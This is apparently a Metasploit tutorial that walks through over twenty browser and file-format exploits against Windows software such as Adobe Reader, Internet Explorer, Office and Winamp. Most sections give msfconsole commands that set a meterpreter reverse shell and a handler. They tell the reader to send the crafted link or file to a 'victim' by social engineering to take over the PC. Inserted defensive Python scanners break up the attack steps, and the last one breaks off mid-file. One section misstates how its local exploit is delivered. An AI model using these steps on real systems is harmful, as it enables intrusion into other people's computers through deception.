This module exploits a vulnerability in the Smart Independent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_cooltype_sing
Msf exploit (adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_cooltype_sing)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_cooltype_sing)>set uripath fr (The Url to use for this exploit)
Msf exploit (adobe_cooltype_sing)>exploit
Now give your victim the URL http://192.168.42.131:8080/fr
Send the link of the server to the victim via any social engineering technique.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Adobe JBIG2Decode Heap Corruption Exploit :
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_jbig2decode
Msf exploit (adobe_jbig2decode)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_jbig2decode)>set uripath beniimage (The Url to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit
Now give your victim the URL http://192.168.42.131:8080/beniimage
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Adobe Collab.getIcon() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/adobe_geticon
Msf exploit (adobe_geticon)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_geticon)>show options
Msf exploit (adobe_geticon)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_geticon)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_geticon)>set uripath adb (The Url to use for this exploit)
Msf exploit (adobe_geticon)>exploit
Now give your victim the URL http://192.168.42.131:8080/adb
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
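As an added defender-side example (written for this page, not part of the original paper or of Metasploit), the following Python script triages a PDF for the features the Adobe Reader modules above depend on: JavaScript actions and the JavaScript APIs named in these sections, auto-run actions, embedded files, and U3D or JBIG2 streams. The watch-list, the handling of PDF name escapes and Flate-compressed streams, and the sample document are all constructed for this example.

```python
import json
import re
import zlib

# Watch-list constructed for this example: PDF names that the Adobe Reader
# modules discussed above rely on (JavaScript carriers, auto-run actions,
# embedded files, U3D and JBIG2 streams). Not a vendor signature set.
SUSPICIOUS_NAMES = {
    b"/JavaScript": "JavaScript action (typical heap-spray carrier)",
    b"/JS": "inline JavaScript",
    b"/OpenAction": "action executed when the document is opened",
    b"/AA": "additional-actions dictionary (page/field triggers)",
    b"/Launch": "launch action (runs an external program)",
    b"/EmbeddedFile": "embedded file stream (embedded-EXE technique)",
    b"/U3D": "U3D 3D model stream",
    b"/JBIG2Decode": "JBIG2 image filter",
    b"/RichMedia": "rich media annotation (media player)",
}

# JavaScript API names abused by the modules above; matched as plain substrings.
SUSPICIOUS_APIS = [b"collectEmailInfo", b"getIcon", b"newPlayer", b"util.printf", b"unescape"]

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def unescape_names(data: bytes) -> bytes:
    """Undo PDF name escapes such as /J#61vaScript, which hide names from a naive grep."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> list:
    """Decompress every FlateDecode stream so scripts inside it can be scanned.
    Streams that are not zlib data are skipped; their raw bytes are already in the file body."""
    bodies = []
    for m in STREAM_RE.finditer(data):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass
    return bodies


def triage_pdf(data: bytes) -> dict:
    """Scan raw PDF bytes and report risky features plus a coarse verdict."""
    views = [unescape_names(data)] + [unescape_names(b) for b in inflate_streams(data)]
    findings = {}
    for name, why in SUSPICIOUS_NAMES.items():
        # The name must end here: /JS must not match /JSFoo, /AA must not match /AAPL.
        pat = re.compile(re.escape(name) + rb"(?![A-Za-z0-9])")
        count = sum(len(pat.findall(v)) for v in views)
        if count:
            findings[name.decode()] = {"count": count, "why": why}
    apis = sorted(a.decode() for a in SUSPICIOUS_APIS if any(a in v for v in views))
    has_script = "/JavaScript" in findings or "/JS" in findings
    auto_run = "/OpenAction" in findings or "/AA" in findings
    if apis or "/Launch" in findings or "/EmbeddedFile" in findings or (has_script and auto_run):
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"findings": findings, "apis": apis, "verdict": verdict}


def build_sample_pdf() -> bytes:
    """Constructed sample: a one-page PDF whose OpenAction (written with a name
    escape) points at a Flate-compressed JavaScript stream naming one of the APIs."""
    js = zlib.compress(b"var api = Collab.collectEmailInfo; app.alert('constructed sample');")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Filter /FlateDecode /Length %d >>\nstream\n%s\nendstream" % (len(js), js),
    ]
    body = b"%PDF-1.4\n"
    for num, obj in enumerate(objects, start=1):
        body += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    return body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    print(json.dumps(triage_pdf(build_sample_pdf()), indent=2))
```

A document that is only "review" (for example a PDF with a JavaScript form validator but no auto-run action) still deserves a look at the decompressed script text, which this scan keeps in `views`.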
Attacking on Remote Windows PC using Microsoft Internet Explorer execCommand Use-After-Free Vulnerability :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ie_execcommand_uaf)>set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit (ie_execcommand_uaf)>set uripath ie (The Url to use for this exploit)
msf exploit (ie_execcommand_uaf)>exploit
Now give your victim the URL http://192.168.42.131:8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer COM CreateObject Code Execution :
This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ie_createobject
Msf exploit (ie_createobject)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ie_createobject)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ie_createobject)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ie_createobject)>set uripath ie (The Url to use for this exploit)
Msf exploit (ie_createobject)>exploit
Now give your victim the URL http://192.168.42.131:8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer WebViewFolderIcon setSlice() Overflow :
This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms06_057_webview_setslice
Msf exploit (ms06_057_webview_setslice)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_057_webview_setslice)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_057_webview_setslice)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_057_webview_setslice)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_057_webview_setslice)>exploit
Now give your victim the URL http://192.168.42.131:8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability :
This module exploits a heap overflow vulnerability in the KeyFrame method of the Direct Animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms06_067_keyframe
Msf exploit (ms06_067_keyframe)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_067_keyframe)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_067_keyframe)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_067_keyframe)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_067_keyframe)>exploit
Now give your victim the URL http://192.168.42.131:8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer createTextRange() Code Execution :
This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms06_013_createtextrange
Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_013_createtextrange)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_013_createtextrange)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_013_createtextrange)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_013_createtextrange)>exploit
Now give your victim the URL http://192.168.42.131:8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using MS11_003 Internet Explorer Exploit :
This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt in to ASLR. As such, it should be reliable on all Windows versions with .NET 2.0.50727 installed.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms11_003_ie_css_import
Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on; default: 8080)
Msf exploit (ms11_003_ie_css_import)>set uripath hack.flv (The Url to use for this exploit)
Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ms11_003_ie_css_import)>exploit
Now give your victim the URL http://192.168.42.131:80/hack.flv
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC in LAN using Internet Explorer DHTML Behaviors :
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms10_018_ie_behaviors
Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_018_ie_behaviors)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms10_018_ie_behaviors)>exploit
Now give your victim the URL http://192.168.42.131:80/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows XP PC using Internet Explorer Winhlp32.exe MsgBox Code Execution :
This module exploits a code execution vulnerability that occurs when a user presses F1 on a Message Box originating from VBScript within a web page. When the user hits F1, the Message Box help functionality will attempt to load and use an HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve the HLP file as well as a payload EXE. During testing, warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The Url to use for this exploit)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit
Now give your victim the URL http://192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer CSS SetUserClip Memory Corruption Exploit :
This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems that Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “*vtable+0x30+1+“. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable: specifically, those that end up with a program counter value within another module, in kernel space, or simply not reachable with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms10_090_ie_css_clip
Msf exploit (ms10_090_ie_css_clip)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_090_ie_css_clip)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_090_ie_css_clip)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_090_ie_css_clip)>set uripath clips (The Url to use for this exploit)
Msf exploit (ms10_090_ie_css_clip)>exploit
Now give your victim the URL http://192.168.42.131:8080/clips
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption :
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/ms09_002_memory_corruption
Msf exploit (ms09_002_memory_corruption)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms09_002_memory_corruption)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms09_002_memory_corruption)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms09_002_memory_corruption)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms09_002_memory_corruption)>exploit
Now give your victim the URL http://192.168.42.131:80/ie
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment a DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/apple_quicktime_texml_font_table
msf exploit (apple_quicktime_texml_font_table)>set payload windows/meterpreter/reverse_tcp
msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit)
msf exploit (apple_quicktime_texml_font_table)>exploit
Now give your victim the URL http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
Attacking on Remote Windows PC using gAlan 0.2.1 Buffer Overflow :
This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/galan_fileformat_bof
msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (galan_fileformat_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (galan_fileformat_bof)>exploit
After we successfully generate the malicious galan file, it will be stored on your local computer at
/root/.msf4/local/msf.galan
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
Now send your msf.galan file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Attacking on Remote Windows PC using Orbit Downloader URL Unicode Conversion Overflow :
This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting a URL ASCII string to Unicode in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the “File->Add Metalink…” option.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/orbit_download_failed_bof
msf exploit (orbit_download_failed_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (orbit_download_failed_bof)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (orbit_download_failed_bof)>exploit
After we successfully generate the malicious metalink file, it will be stored on your local computer at
/root/.msf4/local/msf.metalink
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
Now send your msf.metalink file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Attacking on Remote Windows PC using OpenVPN Trusted Path Privilege Escalation :
This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as an example: C:\program files\hello.exe. The Windows API will try to interpret this as two possible paths, C:\program.exe and C:\program files\hello.exe, and then execute all of them. To some software developers this is unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalating privileges if the service runs as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Securely” on page 676.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/local/trusted_service_path
msf exploit (trusted_service_path)>set payload windows/meterpreter/reverse_tcp
msf exploit (trusted_service_path)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (trusted_service_path)>set lport 4443 (Port of the local machine)
msf exploit (trusted_service_path)>set session 1
msf exploit (trusted_service_path)>exploit
Now give your victim the URL http://192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use “sessions -l” and the session number to connect to the session.
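As an added example for the lpApplicationName ambiguity described above (written for this page; it is not OpenVPN's or Metasploit's code), the following Python audit mirrors the prefix-by-prefix lookup the text describes, reports which service ImagePath values are ambiguous, lists the directories whose write permissions must then be reviewed, and produces the quoted form that removes the ambiguity. The service names and paths are constructed and do not describe any real product's installation.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of service ImagePath values; names and paths are made up
# for this example and do not describe any real product's installation.
SAMPLE_SERVICES = {
    "ExampleVPN": r"C:\Program Files\Example VPN\bin\vpnserv.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "QuotedAgent": r'"C:\Program Files\Vendor Agent\agent.exe" --service',
    "UnquotedAgent": r"C:\Program Files (x86)\Vendor Agent\agent.exe -k run",
}

# Unquoted command line: everything up to the first ".exe" is the executable.
EXE_THEN_ARGS = re.compile(r"(?is)(.*?\.exe)(.*)")


def split_command(image_path: str) -> tuple:
    """Return (executable, arguments) for an ImagePath string.
    A quoted path is unambiguous; an unquoted one is cut at the first '.exe'."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        exe, _, rest = image_path[1:].partition('"')
        return exe, rest
    m = EXE_THEN_ARGS.match(image_path)
    return (m.group(1), m.group(2)) if m else (image_path, "")


def candidate_paths(image_path: str) -> list:
    r"""Paths Windows tries, in order, for an unquoted executable containing spaces:
    each space-delimited prefix with .exe appended, then the full path. This
    mirrors the C:\program.exe / C:\program files\hello.exe ambiguity above."""
    if image_path.strip().startswith('"'):
        return [split_command(image_path)[0]]
    exe, _ = split_command(image_path)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def audit_service_paths(services: dict) -> dict:
    """Map each ambiguous service to the unintended paths Windows would try first.
    Quoted paths and paths without spaces produce a single candidate and are skipped."""
    report = {}
    for name, path in services.items():
        unintended = candidate_paths(path)[:-1]
        if unintended:
            report[name] = unintended
    return report


def directories_to_review(report: dict) -> set:
    """Directories whose write ACLs must be reviewed as long as a path stays unquoted."""
    return {str(PureWindowsPath(p).parent) for paths in report.values() for p in paths}


def quote_image_path(image_path: str) -> str:
    """Hardening: return the ImagePath with the executable quoted and arguments intact."""
    if image_path.strip().startswith('"'):
        return image_path.strip()
    exe, args = split_command(image_path)
    return '"%s"%s' % (exe, args) if " " in exe else image_path.strip()


if __name__ == "__main__":
    findings = audit_service_paths(SAMPLE_SERVICES)
    for svc, paths in findings.items():
        print(svc, "->", paths)
        print("   fix:", quote_image_path(SAMPLE_SERVICES[svc]))
    print("review write access on:", sorted(directories_to_review(findings)))
```

On a real host the dictionary would be filled from the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services; the logic above does not read the registry itself.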
Attacking on Remote Windows PC using Winamp MAKI Buffer Overflow :
This module exploits a stack-based buffer overflow in Winamp 5.55. The flaw exists in gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user-controlled data. To exploit the vulnerability the attacker must convince the target user to install the generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/winamp_maki_bof
msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (winamp_maki_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (winamp_maki_bof)>exploit
After we successfully generate the malicious MAKI file, it will be stored on your local computer at
/root/.msf4/local/mcvcore.maki
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
Now send your mcvcore.maki file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Attacking on Remote Windows PC using Microsoft Office Word MS12-027 MSCOMCTL ActiveX Buffer Overflow :
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 control as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which is loaded after Office has loaded, so the malicious file must be loaded through “File / Open” to achieve exploitation.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ms12_027_mscomctl_bof)>exploit
After we successfully generate the malicious DOC file, it will be stored on your local computer at
/root/.msf4/local/msf.doc
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your msf.doc file to the victim; as soon as they download and open it, you can access the meterpreter shell on the victim's computer.
Attacking on Remote Windows PC using GlobalSCAPE CuteZIP Stack Buffer Overflow :
This module exploits a stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/cutezip_bof
msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cutezip_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (cutezip_bof)>exploit
After we successfully generate the malicious ZIP file, it will be stored on your local computer at
/root/.msf4/local/msf.zip
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your msf.zip file to the victim; as soon as they download and open it, you can access the meterpreter shell.
Attacking on Remote Windows PC using Simple Web Server Connection Header Buffer Overflow :
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send long string data in the Connection header to cause an overflow on the stack when the function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/http/sws_connection_bof
msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host]
msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC]
msf exploit(sws_connection_bof) > exploit
Now the URL you should give to your victim is http://192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
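The description above says the overflow is triggered by an over-long value in the HTTP Connection header. From the defender's side the useful artefact is that a legitimate Connection header is a short comma-separated list of RFC 7230 tokens, so a request with a multi-kilobyte or non-token value is worth alerting on at a proxy or in a packet-capture replay. The following detector is an added example written for this tutorial, not code from the Metasploit module or from Simple Web Server; the sample requests are constructed, and the 256-byte threshold is an assumption chosen to sit far above any real Connection value.

```python
import re
from typing import Dict, List, Optional

# Constructed sample requests (not captured traffic): two ordinary requests and
# one carrying an abnormally long Connection header like the one described above.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: keep-alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: close\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: " + "A" * 2048 + "\r\n\r\n",
]

# Assumed threshold: real Connection values are a handful of short tokens, so
# anything beyond this length is treated as an overflow attempt.
MAX_CONNECTION_LEN = 256

# RFC 7230 "tchar": the only characters allowed inside a Connection list token.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into {lowercased header name: value}."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_connection_header(raw: str) -> Optional[str]:
    """Return a reason string if the Connection header looks hostile, else None."""
    value = parse_headers(raw).get("connection")
    if value is None:
        return None
    if len(value) > MAX_CONNECTION_LEN:
        return f"Connection header too long ({len(value)} bytes)"
    # Each comma-separated element must be a bare token; shellcode or padding is not.
    bad = [t for t in value.split(",") if not TOKEN_RE.match(t.strip())]
    if bad:
        return f"Connection header contains non-token data ({len(bad)} element(s))"
    return None


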